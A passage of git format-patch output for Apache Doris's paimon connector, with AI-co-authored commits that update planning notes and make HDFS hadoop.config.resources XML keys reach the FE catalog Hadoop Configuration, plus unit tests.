CREATE CATALOG. +- [ ] **P6-R3-catalog** include catalog name in `listDatabaseNames` `LOG.warn` (decide keep best-effort swallow). + +## Accept-as-deviation (no code; needs user sign-off) + +- [ ] **P6-DEVIATIONS** — ~10 MINOR + ~12 NIT intentional deviations + wave-2 new items + uncheckedFallbacks + (see report §Legacy-diff ledger "intended=Yes" rows + §Wave 2 new findings). Record each in `deviations-log.md`. From 204c6fac6226dba6dcfe38e28709175f516ef8c9 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 23:54:44 +0800 Subject: [PATCH 101/128] =?UTF-8?q?docs(catalog-spi):=20P6=20C1=20MinIO=20?= =?UTF-8?q?fix=20done=20=E2=86=92=20HANDOFF=20next=20=3D=20C2=20(HDFS=20XM?= =?UTF-8?q?L)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - mark P6-C1 complete (9967846ef64) in HANDOFF + task-list-P6-fixes - set next session start point = C2 (hadoop.config.resources XML into FE catalog-create Configuration; XML-only sub-item, kerberos-by-alias refuted) Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 23 +++++++++++++++++------ plan-doc/task-list-P6-fixes.md | 9 +++++---- 2 files changed, 22 insertions(+), 10 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 6f6fbb3877fcad..9e67ec6d056324 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,7 +6,19 @@ --- -# 🎯 下一个 session 的任务 — **P6 review 已完成 → 进入「修复发现项」+「分阶段 B8 删除」** +# 🎯 下一个 session 的任务 — **P6 修复进行中:C1 DONE → 下一个 = C2 (HDFS XML)** + +> **进度(2026-06-18)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: +> design → 红队 → 实现 → impl 验证 → build+UT → commit)。 +> **✅ C1 (MinIO, MAJOR) 已完成并提交 `9967846ef64`**:minio.* 别名进**共享** `fe-filesystem-s3` +> (`S3FileSystemProperties` 各字段 names() 末尾追加 minio.* + `S3FileSystemProvider` 三个检测数组), +> **保留 legacy MinIO tuning 默认 100/10000/10000**(gated `applyLegacyMinioTuningDefaults()` 在 normalize 钩子里, +> 按 raw-key 存在判定→显式值仍优先;s3.* 路 byte-parity 不动);region us-east-1 由既有 endpoint-only 分支保留。 +> 28/0/0 UT,BUILD SUCCESS,checkstyle 干净;**docker e2e(`enablePaimonTest`)未跑**。 +> 设计/红队结论详见 `designs/FIX-C1-MINIO-{design,summary}.md`(红队**推翻**了首版「接受 tuning 偏离」→改为保留)。 +> **下一个 = C2 (HDFS `hadoop.config.resources` XML, MAJOR)**:filesystem/jdbc flavor 把 XML 载入 FE 建表 +> Configuration(荐 `HdfsFileSystemProperties` 暴露已载入 backend map);**仅 XML 子项**(kerberos-by-alias 已证非负载性)。 +> 然后 5 个 MINOR(R3-residual / R1-table / C4 / R2-catalog / R3-catalog),最后 accept-as-deviation 批次。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 报告:[`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md)(未跟踪,待 vet+commit)。 @@ -35,10 +47,9 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 # 🔭 主线 backlog(P6 review 已出报告,按此排) -0. **修复 P6 发现项**(报告 §Coverage gaps & follow-ups → prioritized fix-task list;每个独立 fix task): - - **C1 MinIO**(MAJOR / 若部署用 `minio.*` 键则 BLOCKER):`S3FileSystemProvider.supports()` + `S3FileSystemProperties` - @ConnectorProperty 加 `minio.*` 别名(endpoint/access_key/secret_key/session_token/region/use_path_style/connection.*), - 保 MinIO 默认(region `us-east-1`、tuning 100/10000/10000);UT 钉 FE `fs.s3.impl`/`fs.s3a.*` + BE `location.AWS_*`。 +0. **修复 P6 发现项**(报告 §Coverage gaps & follow-ups → prioritized fix-task list;每个独立 fix task; + 逐项进度见 `task-list-P6-fixes.md`): + - ✅ **C1 MinIO**(MAJOR)— **DONE `9967846ef64`**(minio.* 别名进共享 fe-filesystem-s3 + 保留 tuning 默认;28/0/0 UT)。 - **C2 HDFS XML**(MAJOR):filesystem/jdbc flavor 把 `hadoop.config.resources` XML 载入 FE 建表 Configuration(推荐让 `HdfsFileSystemProperties` 实现 `HadoopStorageProperties` 暴露已载入的 backend map,复用 BE 路那张图)。**仅 XML 子项** (kerberos-alias 已证非负载性)。 @@ -70,7 +81,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `13d3876d25d`**(元存储子线 P1-T07:删 fe-property 孤儿模块)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `9967846ef64`**(P6 修复 C1 MinIO;前序 `13d3876d25d` 元存储子线 P1-T07 删 fe-property 孤儿模块)。当前分支 **`catalog-spi-07-paimon`**(非 master); 已同步 push 到 `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head, force-with-lease)。 - **主线(P0–P5)**:paimon connector SPI cutover + round-3 clean-room review 的 4 个 user-approved fix 全完成 diff --git a/plan-doc/task-list-P6-fixes.md b/plan-doc/task-list-P6-fixes.md index e00513da5a7ca7..636e5eec69fcd6 100644 --- a/plan-doc/task-list-P6-fixes.md +++ b/plan-doc/task-list-P6-fixes.md @@ -6,10 +6,11 @@ ## Code-change fixes (priority order) -- [ ] **P6-C1** MinIO `minio.*` aliases (MAJOR / BLOCKER-if-deployment-uses-`minio.*`) - — add `minio.*` aliases to `S3FileSystemProperties` + `S3FileSystemProvider.supports()`; - preserve MinIO defaults (region `us-east-1`, tuning 100/10000/10000). UT: FE `fs.s3.impl`/`fs.s3a.*` + BE `location.AWS_*`. - ⚠️ shared cross-connector (iceberg/hive use S3 provider) → must not break canonical `s3.*` path. +- [x] **P6-C1** MinIO `minio.*` aliases (MAJOR / BLOCKER-if-deployment-uses-`minio.*`) — **DONE `9967846ef64`** + — added `minio.*` aliases to `S3FileSystemProperties` + `S3FileSystemProvider`; preserved MinIO defaults + (region `us-east-1`, tuning 100/10000/10000 via gated normalize hook). 28/0/0 UT (FE `fs.s3.impl`/`fs.s3a.*` + + BE `AWS_*` + tuning-preserve + s3-outranks-minio precedence). `s3.*` path byte-unchanged. e2e gated/not-run. + Decision: PRESERVE tuning defaults (red-team refuted the "accept deviation" pass). See FIX-C1-MINIO-{design,summary}.md. - [ ] **P6-C2** HDFS `hadoop.config.resources` XML into FE catalog-create Configuration (MAJOR) — filesystem/jdbc flavor; recommend `HdfsFileSystemProperties` expose its already-XML-loaded backend map. **XML-resource gap ONLY** (kerberos-by-alias sub-claim was refuted: per-FS auth marker non-load-bearing). From e95128aed5bfb4ff52083b46f2312351e7a946e1 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 00:58:39 +0800 Subject: [PATCH 102/128] =?UTF-8?q?fix:=20FIX-C2-HDFS-XML=20=E2=80=94=20lo?= =?UTF-8?q?ad=20hadoop.config.resources=20XML=20into=20the=20FE=20catalog?= =?UTF-8?q?=20Configuration?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit P6 clean-room finding C2 (MAJOR). A paimon catalog whose HDFS HA topology lives only in a `hadoop.config.resources` XML file could not resolve its nameservice on the SPI plugin path (filesystem/jdbc): the FE catalog-create Configuration copied the `hadoop.config.resources` key verbatim but never loaded the XML contents, so `hdfs://ns1/...` failed to resolve `ns1`. (BE/scan path was unaffected.) Root cause: `HdfsFileSystemProperties` did not implement `HadoopStorageProperties`, so `toHadoopProperties()` was empty and HDFS contributed nothing to the connector's `buildStorageHadoopConfig()` -> FE Configuration. The XML keys (already parsed into `backendConfigProperties` at bind time for the BE path) never reached the FE config. Solution: `HdfsFileSystemProperties implements HadoopStorageProperties`. `toHadoopConfigurationMap()` returns a DEFAULTS-FREE map (XML + HA + auth keys, via `new Configuration(false)`), while `toMap()` (BE) keeps the defaults-laden map for byte-parity with legacy `getBackendConfigProperties()`. Defaults-free because a naive full `backendConfigProperties` carries 62 `fs.s3a.*` Hadoop defaults that, in a multi-backend catalog (object store + HDFS-with-XML), would clobber a co-bound S3/MinIO provider's tuned `fs.s3a.path.style.access=true` (a regression vs the current branch; found by the design red-team, empirically verified on hadoop 3.4.2). Parity for filesystem/jdbc/hms; DLF deviation accepted (DV-036). Also corrected 4 stale comments asserting the now-false "HDFS contributes nothing to storageHadoopConfig". Tests: flipped the bug-encoding `classifiersMatchHdfs` assertion; added `xmlKeysReachHadoopConfigMap` (C2 regression pin), `hadoopConfigMapExcludesFramework DefaultsButBeMapKeepsThem` (clobber guard + FE/BE asymmetry), `hadoopConfigMapKeepsMeaningfulKeys`, and a connector end-to-end glue test `buildStorageHadoopConfigFoldsInHdfsHadoopMap`. fe-filesystem-hdfs 28/0, paimon 279/0/1-skip, checkstyle + connector-import-check clean; docker e2e gated/not-run. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../metastore/spi/MetaStoreParseUtils.java | 7 +- .../paimon/PaimonCatalogFactory.java | 18 +- .../connector/paimon/PaimonConnector.java | 27 +- .../paimon/PaimonCatalogFactoryTest.java | 74 ++++++ .../paimon/RecordingConnectorContext.java | 11 + .../doris/connector/spi/ConnectorContext.java | 7 +- .../filesystem/hdfs/HdfsConfigFileLoader.java | 28 +- .../hdfs/HdfsFileSystemProperties.java | 59 ++++- .../hdfs/HdfsFileSystemPropertiesTest.java | 89 ++++++- plan-doc/designs/FIX-C2-HDFS-XML-design.md | 241 ++++++++++++++++++ plan-doc/designs/FIX-C2-HDFS-XML-summary.md | 62 +++++ plan-doc/deviations-log.md | 19 ++ plan-doc/task-list-P6-fixes.md | 10 +- 13 files changed, 609 insertions(+), 43 deletions(-) create mode 100644 plan-doc/designs/FIX-C2-HDFS-XML-design.md create mode 100644 plan-doc/designs/FIX-C2-HDFS-XML-summary.md diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtils.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtils.java index 6732de4909de07..c1b4fd07dbe8cb 100644 --- a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtils.java +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtils.java @@ -82,10 +82,11 @@ public static String nullToEmpty(String s) { /** * Two-step storage overlay (legacy {@code AbstractPaimonProperties} precedence order): first the - * pre-computed canonical object-store config, then the original + * pre-computed canonical storage config, then the original * {@code paimon.s3./s3a./fs.s3./fs.oss.} re-key plus raw {@code fs./dfs./hadoop.} passthrough, - * which run LAST and overlay the canonical translation (last-write-wins). HDFS is absent from - * {@code storageHadoopConfig} and reaches the conf via the raw passthrough. + * which run LAST and overlay the canonical translation (last-write-wins). An HDFS catalog's + * {@code hadoop.config.resources} XML + HA + auth keys arrive via {@code storageHadoopConfig} (C2); + * inline HDFS keys still ride the raw passthrough. */ public static void applyStorageConfig(Map storageHadoopConfig, Map props, BiConsumer setter) { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index a04c7ee3c35b8c..7ab3b2b038a1b0 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -237,9 +237,10 @@ private static void appendDlfOptions(Options options) { * are normalized to the Hadoop S3A prefix {@code fs.s3a.} (strip the matched prefix, * re-key as {@code fs.s3a.} + remainder), matching legacy {@code normalizeS3Config}; *
  • raw {@code fs.*} / {@code dfs.*} / {@code hadoop.*} keys are copied verbatim (these are - * already Hadoop-recognized keys the user passed through). HDFS contributes via this - * passthrough only — it is absent from {@code storageHadoopConfig} (fe-filesystem binds - * object stores only), matching legacy.
  • + * already Hadoop-recognized keys the user passed through). Inline HDFS keys ride this passthrough; + * an HDFS catalog's {@code hadoop.config.resources} XML + HA + auth keys arrive via + * {@code storageHadoopConfig} (C2; fe-filesystem's HDFS model implements {@code HadoopStorageProperties}), + * and the passthrough re-applies the inline keys last (last-write-wins). * * *

    PURE: depends only on {@code props} and {@code storageHadoopConfig}. @@ -276,11 +277,12 @@ public static Configuration buildHadoopConfiguration(Map props, */ private static void applyStorageConfig(Map storageHadoopConfig, Map props, BiConsumer setter) { - // Pre-computed canonical object-store config (fs.s3a.*/fs.oss.*/fs.cosn.*/fs.obs.*), assembled by - // PaimonConnector from ctx.getStorageProperties().toHadoopProperties().toHadoopConfigurationMap() - // (fe-filesystem is now the single source of truth; P1-T03). HDFS is absent here (fe-filesystem - // binds object stores only) and reaches the conf via the raw fs./dfs./hadoop. passthrough below, - // matching legacy (applyStorageConfig never had an HDFS canonical block). + // Pre-computed canonical storage config, assembled by PaimonConnector from + // ctx.getStorageProperties().toHadoopProperties().toHadoopConfigurationMap() (fe-filesystem is the + // single source of truth; P1-T03): object stores contribute fs.s3a.*/fs.oss.*/fs.cosn.*/fs.obs.*, + // and an HDFS catalog contributes its hadoop.config.resources XML + HA + auth keys (C2; the + // fe-filesystem HDFS map is defaults-free so it cannot clobber the object-store keys above). Inline + // HDFS keys still ride the raw fs./dfs./hadoop. passthrough below (re-applied last, last-write-wins). storageHadoopConfig.forEach(setter); // Connector-specific (NOT in fe-filesystem): paimon.* prefix re-key + raw fs./dfs./hadoop. passthrough, // run LAST so explicit fs.s3a.* keys overlay the canonical translation (last-write-wins). diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 30c4f1ef8a5fbc..8f09257ad963fd 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -132,9 +132,12 @@ private Catalog ensureCatalog() { private Catalog createCatalog() { Options options = PaimonCatalogFactory.buildCatalogOptions(properties); String flavor = PaimonCatalogFactory.resolveFlavor(properties); - // Canonical object-store storage config from the FE-bound fe-filesystem StorageProperties - // (P1-T03), replacing the legacy buildObjectStorageHadoopConfig path. Empty for - // REST (server owns storage) and HDFS-only catalogs (carried by the raw passthrough instead). + // Canonical storage config from the FE-bound fe-filesystem StorageProperties (P1-T03), replacing + // the legacy buildObjectStorageHadoopConfig path: object stores contribute their fs.s3a.*/fs.oss.* + // /fs.cosn.*/fs.obs.* translation, and an HDFS-backed catalog contributes its hadoop.config.resources + // XML + HA + auth keys (C2; the defaults-free fe-filesystem Hadoop map). Empty for REST (the server + // owns storage) and for a catalog with no typed storage at all (it reaches the conf via the raw + // fs./dfs./hadoop. passthrough). Map storageHadoopConfig = buildStorageHadoopConfig(); switch (flavor) { @@ -209,17 +212,21 @@ private Catalog createCatalog() { } /** - * Assembles the canonical object-store Hadoop config from the FE-bound storage properties (P1-T03). + * Assembles the canonical storage Hadoop config from the FE-bound storage properties (P1-T03). * fe-core binds the catalog's raw property map to fe-filesystem {@link StorageProperties} and hands * them over via {@link ConnectorContext#getStorageProperties()}; here we merge each one's - * {@code toHadoopProperties().toHadoopConfigurationMap()} (fs.s3a.* / Jindo fs.oss.* / fs.cosn.* / - * fs.obs.* keys). This replaces the legacy - * {@code StorageProperties.buildObjectStorageHadoopConfig(properties)} call that + * {@code toHadoopProperties().toHadoopConfigurationMap()}: object stores contribute their + * fs.s3a.* / Jindo fs.oss.* / fs.cosn.* / fs.obs.* translation, and an HDFS-backed catalog contributes + * its hadoop.config.resources XML + HA + auth keys (C2; the fe-filesystem HDFS Hadoop map is + * defaults-free so it never clobbers a co-bound object-store provider's tuned fs.s3a.* here). This + * replaces the legacy {@code StorageProperties.buildObjectStorageHadoopConfig(properties)} call that * {@link PaimonCatalogFactory#buildHadoopConfiguration}/{@code buildHmsHiveConf}/{@code buildDlfHiveConf} - * used to make. Empty when no static object-store storage is configured — e.g. an HDFS-only catalog - * (which reaches the conf via the raw fs./dfs./hadoop. passthrough) or REST (the server owns storage). + * used to make. Empty for REST (the server owns storage) and for a catalog with no typed storage (it + * reaches the conf via the raw fs./dfs./hadoop. passthrough). */ - private Map buildStorageHadoopConfig() { + // Package-private (not private) so PaimonCatalogFactoryTest can drive the ctx.getStorageProperties() + // -> toHadoopProperties() -> Configuration wiring end-to-end (visible for testing). + Map buildStorageHadoopConfig() { Map merged = new HashMap<>(); for (StorageProperties sp : context.getStorageProperties()) { sp.toHadoopProperties().ifPresent(h -> merged.putAll(h.toHadoopConfigurationMap())); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java index f056e608d087a2..e73f4dd7530b76 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -17,14 +17,21 @@ package org.apache.doris.connector.paimon; +import org.apache.doris.filesystem.FileSystemType; +import org.apache.doris.filesystem.properties.HadoopStorageProperties; +import org.apache.doris.filesystem.properties.StorageKind; +import org.apache.doris.filesystem.properties.StorageProperties; + import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.hive.conf.HiveConf; import org.apache.paimon.options.Options; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import java.util.Collections; import java.util.HashMap; import java.util.Map; +import java.util.Optional; /** * Unit tests for {@link PaimonCatalogFactory}, the pure flavor-assembly core. @@ -288,6 +295,73 @@ public void buildHadoopConfigurationPaimonPrefixOverridesStorageConfig() { Assertions.assertEquals("from-paimon", conf.get("fs.s3a.endpoint")); } + @Test + public void buildStorageHadoopConfigFoldsInHdfsHadoopMap() { + // C2 end-to-end seam: a storage property exposing a Hadoop-config key that is NOT a raw catalog + // prop (so it cannot ride the connector's fs./dfs./hadoop. passthrough) must reach the FE catalog + // Configuration via ctx.getStorageProperties().toHadoopProperties() -> buildStorageHadoopConfig -> + // buildHadoopConfiguration. This is exactly the leg the HDFS C2 fix relies on: after the fix + // HdfsFileSystemProperties.toHadoopProperties() is non-empty and carries its hadoop.config.resources + // XML keys. MUTATION: dropping the toHadoopProperties() merge in buildStorageHadoopConfig -> red. + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.storageProperties = Collections.singletonList( + new StubHadoopStorageProperties(Collections.singletonMap("dfs.custom.key", "custom-value"))); + PaimonConnector connector = new PaimonConnector(props(), ctx); + + Map merged = connector.buildStorageHadoopConfig(); + Assertions.assertEquals("custom-value", merged.get("dfs.custom.key"), + "buildStorageHadoopConfig must fold in each storage prop's toHadoopConfigurationMap()"); + + // ...and that merged map flows into the actual catalog Configuration (the key is absent from props, + // so the only path by which it can land in conf is the storageHadoopConfig overlay). + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props(), merged); + Assertions.assertEquals("custom-value", conf.get("dfs.custom.key")); + } + + /** Minimal {@link StorageProperties} exposing a fixed Hadoop config map (C2 seam test double). */ + private static final class StubHadoopStorageProperties implements StorageProperties, HadoopStorageProperties { + private final Map hadoopConfig; + + StubHadoopStorageProperties(Map hadoopConfig) { + this.hadoopConfig = hadoopConfig; + } + + @Override + public Optional toHadoopProperties() { + return Optional.of(this); + } + + @Override + public Map toHadoopConfigurationMap() { + return hadoopConfig; + } + + @Override + public String providerName() { + return "STUB"; + } + + @Override + public StorageKind kind() { + return StorageKind.HDFS_COMPATIBLE; + } + + @Override + public FileSystemType type() { + return FileSystemType.HDFS; + } + + @Override + public Map rawProperties() { + return Collections.emptyMap(); + } + + @Override + public Map matchedProperties() { + return Collections.emptyMap(); + } + } + // --------------------------------------------------------------------- // assembleHiveConf — seed optional base (hive.conf.resources) THEN overlay shared-parser overrides // (the HiveConf key CONTENT for hms/dlf is produced + parity-tested by fe-connector-metastore-spi's diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java index 98e7882db36ce4..71069e8fce34ea 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java @@ -18,8 +18,10 @@ package org.apache.doris.connector.paimon; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.filesystem.properties.StorageProperties; import java.util.Collections; +import java.util.List; import java.util.Map; import java.util.concurrent.Callable; @@ -46,6 +48,10 @@ final class RecordingConnectorContext implements ConnectorContext { /** The {@code resources} string the connector passed to {@link #loadHiveConfResources}. */ String lastHiveConfResourcesArg; + // ---- C2: getStorageProperties hook (FE-bound fe-filesystem storage props) ---- + /** Storage properties the fake returns from {@link #getStorageProperties()} (default: none). */ + List storageProperties = Collections.emptyList(); + // ---- FIX-URI-NORMALIZE / FIX-REST-VENDED-URI-NORMALIZE: normalizeStorageUri hook ---- /** Number of times the connector invoked {@link #normalizeStorageUri}. */ int normalizeCount; @@ -57,6 +63,11 @@ public String getCatalogName() { return "test"; } + @Override + public List getStorageProperties() { + return storageProperties; + } + @Override public String normalizeStorageUri(String rawUri) { // The 1-arg form folds to the 2-arg with no token, so every caller path is recorded identically. diff --git a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java index 3bc8aa3ced27a1..80f734908b6dc4 100644 --- a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java +++ b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java @@ -218,9 +218,10 @@ default Map getBackendStorageProperties() { * it sees only the {@code fe-filesystem-api} interface. * *

    One entry per configured backend (e.g. an object store, plus HDFS when present), mirroring - * the engine's parsed storage list. Legacy backends that have no typed model (HDFS/broker/local) - * are absent; the connector handles those via its own raw {@code fs.}/{@code dfs.}/{@code hadoop.} - * passthrough. + * the engine's parsed storage list. HDFS has a typed model and contributes its + * {@code hadoop.config.resources} XML + HA + auth keys via {@code toHadoopProperties()} (C2); + * backends with no typed model (broker/local) are absent and the connector handles those via its own + * raw {@code fs.}/{@code dfs.}/{@code hadoop.} passthrough. * *

    The default returns an empty list (no storage machinery), so every other connector — and any * credential-less warehouse — is unaffected. diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java index fe788247ed2dca..4514ddbcf560b5 100644 --- a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsConfigFileLoader.java @@ -72,20 +72,40 @@ static String resolveHadoopConfigDir() { /** * Loads the comma-separated config files (each resolved under {@link #hadoopConfigDir}) and returns all - * resolved Hadoop configuration entries as a mutable map. Returns an empty map when {@code resourcesPath} - * is blank. The underlying {@link Configuration} is created with Hadoop's defaults loaded, matching the - * legacy behavior (the BE receives the full resolved set). + * resolved Hadoop configuration entries as a mutable map, WITH Hadoop's built-in defaults loaded + * (the BE receives the full resolved set). Equivalent to {@link #loadConfigMap(String, boolean) + * loadConfigMap(resourcesPath, true)}; kept for the backend key set's byte-parity with the legacy path. * * @param resourcesPath comma-separated list of config file names; may be blank * @return a mutable map of the loaded Hadoop configuration entries (never null) * @throws IllegalArgumentException if a referenced file is missing */ public static Map loadConfigMap(String resourcesPath) { + return loadConfigMap(resourcesPath, true); + } + + /** + * Loads the comma-separated config files into a key-value map. Returns an empty map when + * {@code resourcesPath} is blank. + * + *

    When {@code loadHadoopDefaults} is {@code true} the underlying {@link Configuration} carries + * Hadoop's built-in defaults (core-default.xml) — the full resolved set the BE expects. When + * {@code false} only the named XML files' own keys are returned (no framework defaults): this is the + * FE catalog-create Hadoop-config map, kept defaults-free so it never clobbers a co-bound object-store + * provider's tuned {@code fs.s3a.*} values when merged into a multi-backend catalog Configuration (the + * base {@code Configuration} already supplies every Hadoop default). + * + * @param resourcesPath comma-separated list of config file names; may be blank + * @param loadHadoopDefaults whether to include Hadoop's built-in default resources + * @return a mutable map of the loaded Hadoop configuration entries (never null) + * @throws IllegalArgumentException if a referenced file is missing + */ + public static Map loadConfigMap(String resourcesPath, boolean loadHadoopDefaults) { Map confMap = new HashMap<>(); if (StringUtils.isBlank(resourcesPath)) { return confMap; } - Configuration conf = new Configuration(); + Configuration conf = new Configuration(loadHadoopDefaults); String baseDir = resolveHadoopConfigDir(); for (String resource : resourcesPath.split(",")) { String resourcePath = baseDir + resource.trim(); diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java index a3ff3691162fcf..532081b701baec 100644 --- a/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/main/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemProperties.java @@ -21,6 +21,7 @@ import org.apache.doris.filesystem.properties.BackendStorageKind; import org.apache.doris.filesystem.properties.BackendStorageProperties; import org.apache.doris.filesystem.properties.FileSystemProperties; +import org.apache.doris.filesystem.properties.HadoopStorageProperties; import org.apache.doris.filesystem.properties.StorageKind; import org.apache.doris.foundation.property.ConnectorPropertiesUtils; import org.apache.doris.foundation.property.ConnectorProperty; @@ -50,13 +51,18 @@ * {@code org.apache.doris.datasource.property.storage.HdfsProperties.getBackendConfigProperties()} so the * new typed path and the legacy path stay at parity. * - *

    Scope note: this model deliberately does NOT implement {@code HadoopStorageProperties}. The - * FE-side Hadoop {@link org.apache.hadoop.conf.Configuration} used to actually open an HDFS file system is - * still built by {@link HdfsConfigBuilder} on the {@link HdfsFileSystemProvider#create(Map)} path, and the - * real {@code UGI.doAs} stays in fe-core/ctx. This class emits only the neutral BE key strings; Kerberos - * here is BE-key emission only, no authenticator is built (K1). + *

    It also implements {@link HadoopStorageProperties} (C2) so the connector's FE catalog-create + * Hadoop {@link org.apache.hadoop.conf.Configuration} picks up the {@code hadoop.config.resources} XML + + * HA + auth keys via the typed {@code toHadoopProperties().toHadoopConfigurationMap()} pipeline. That FE + * map is built defaults-free (see {@link #toHadoopConfigurationMap()}) so it never clobbers a + * co-bound object-store provider's tuned {@code fs.s3a.*} values, whereas {@link #toMap()} (BE) stays + * defaults-laden for byte-parity with the legacy backend key set. The {@code Configuration} that actually + * opens an HDFS file system on the {@link HdfsFileSystemProvider#create(Map)} path is still built by + * {@link HdfsConfigBuilder}, and the real {@code UGI.doAs} stays in fe-core/ctx — this class emits only + * key strings; Kerberos here is key emission only, no authenticator is built (K1). */ -public final class HdfsFileSystemProperties implements FileSystemProperties, BackendStorageProperties { +public final class HdfsFileSystemProperties + implements FileSystemProperties, BackendStorageProperties, HadoopStorageProperties { public static final String HDFS_DEFAULT_FS_NAME = "fs.defaultFS"; @@ -114,7 +120,12 @@ public final class HdfsFileSystemProperties implements FileSystemProperties, Bac private final Map rawProperties; private final Map matchedProperties; + // BE key set: defaults-laden (Hadoop core-default.xml + the XML resources), byte-parity with legacy. private final Map backendConfigProperties; + // FE catalog-create Hadoop config: same key set MINUS Hadoop's framework defaults (C2). Defaults-free + // so it cannot clobber a co-bound object-store provider's tuned fs.s3a.* values in a multi-backend + // merge; the base Configuration already supplies every Hadoop default. + private final Map hadoopConfigProperties; private HdfsFileSystemProperties(Map rawProperties) { this.rawProperties = Collections.unmodifiableMap(new HashMap<>(rawProperties)); @@ -124,7 +135,9 @@ private HdfsFileSystemProperties(Map rawProperties) { this.fsDefaultFS = extractDefaultFsFromUri(rawProperties); } this.backendConfigProperties = - Collections.unmodifiableMap(buildBackendConfigProperties(rawProperties)); + Collections.unmodifiableMap(buildConfigProperties(rawProperties, true)); + this.hadoopConfigProperties = + Collections.unmodifiableMap(buildConfigProperties(rawProperties, false)); } /** Binds and validates raw properties. */ @@ -185,18 +198,44 @@ public Map toMap() { return backendConfigProperties; } + @Override + public Optional toHadoopProperties() { + return Optional.of(this); + } + + /** + * FE catalog-create Hadoop config map (C2): the {@code hadoop.config.resources} XML keys + user + * {@code hadoop./dfs./fs./juicefs.} overrides + synthesized {@code fs.defaultFS}/ipc/auth/kerberos + * keys, but without Hadoop's built-in framework defaults. Closes C2 (the XML/HA keys reach the + * paimon FE Configuration for the filesystem/jdbc/hms flavors). Defaults-free because the base + * {@link 